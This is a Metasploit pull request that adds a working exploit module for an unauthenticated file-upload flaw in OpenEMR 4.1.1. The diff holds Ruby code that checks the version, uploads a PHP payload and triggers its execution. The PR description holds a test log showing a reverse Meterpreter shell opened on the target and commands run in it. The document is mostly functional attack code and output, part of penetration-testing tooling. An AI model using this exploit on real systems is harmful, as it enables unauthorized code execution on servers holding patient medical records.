### PR TITLE
Added module for OSVDB 90222

### DIFF
--- a/modules/exploits/unix/webapp/openemr_upload_exec.rb
+++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb
@@ -1,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "OpenEMR PHP File Upload Vulnerability",
+			'Description'    => %q{
+					This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
+				ofc_upload_image.php file from the openflashchart library, a malicious user can
+				upload a file to the tmp-upload-images directory without any authentication, which
+				results in arbitrary code execution. The module has been tested successfully on
+				OpenEMR 4.1.1 over Ubuntu 10.04.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'OSVDB', '90222' ],
+					[ 'BID', '37314' ],
+					[ 'EBD', '24492' ],
+					[ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
+					[ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
+				],
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['OpenEMR 4.1.1', {}]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Feb 13 2013",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
+				], self.class)
+	end
+
+	def check
+		uri = target_uri.path
+		peer = "#{rhost}:#{rport}"
+
+		# Check version
+		print_status("#{peer} - Trying to detect installed version")
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => normalize_uri(uri, "interface", "login", "login.php")
+		})
+
+		if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
+			version = $1
+		else
+			return Exploit::CheckCode::Unknown
+		end
+
+		print_status("#{peer} - Version #{version} detected")
+
+		if version > "4.1.1"
+			return Exploit::CheckCode::Safe
+		end
+
+		# Check for vulnerable component
+		print_status("#{peer} - Trying to detect the vulnerable component")
+
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
+		})
+
+		if res and res.code == 200 and res.body =~ /Saving your image to/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		uri = target_uri.path
+
+		peer = "#{rhost}:#{rport}"
+		payload_name = rand_text_alpha(rand(10) + 5) + '.php'
+		my_payload = payload.encoded
+
+		print_status("#{peer} - Sending PHP payload (#{payload_name})")
+		res = send_request_raw({
+			'method'  => 'POST',
+			'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
+			'headers' => { "Content-Length" => my_payload.length.to_s },
+			'data'    => my_payload
+		})
+
+		# If the server returns 200 and the body contains our payload name,
+		# we assume we uploaded the malicious file successfully
+		if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
+			fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
+		end
+
+		register_file_for_cleanup(payload_name)
+
+		print_status("#{peer} - Executing PHP payload (#{payload_name})")
+		# Execute our payload
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
+		})
+
+		# If we don't get a 200 when we request our malicious payload, we suspect
+		# we don't have a shell, either.  Print the status code for debugging purposes.
+		if res and res.code != 200
+			print_error("#{peer} - Server returned #{res.code.to_s}")
+		end
+	end
+
+end


### PR DESCRIPTION
Tested with OpenEMR 4.1.1 on Ubuntu 10.04:

```
msf  exploit(openemr_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.142:80 - Sending PHP payload (FaWleJOVabmAP.php)
[*] 192.168.1.142:80 - Executing PHP payload (FaWleJOVabmAP.php)
[*] Sending stage (39217 bytes) to 192.168.1.142
[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.142:53440) at 2013-02-16 13:12:43 +0100
[+] Deleted FaWleJOVabmAP.php

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
eComputer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.142 - Meterpreter session 5 closed.  Reason: User exit
msf  exploit(openemr_upload_exec) > check

[*] 192.168.1.142:80 - Trying to detect installed version
[*] 192.168.1.142:80 - Version 4.1.1 detected
[*] 192.168.1.142:80 - Trying to detect the vulnerable component
[*] The target service is running, but could not be validated.

```
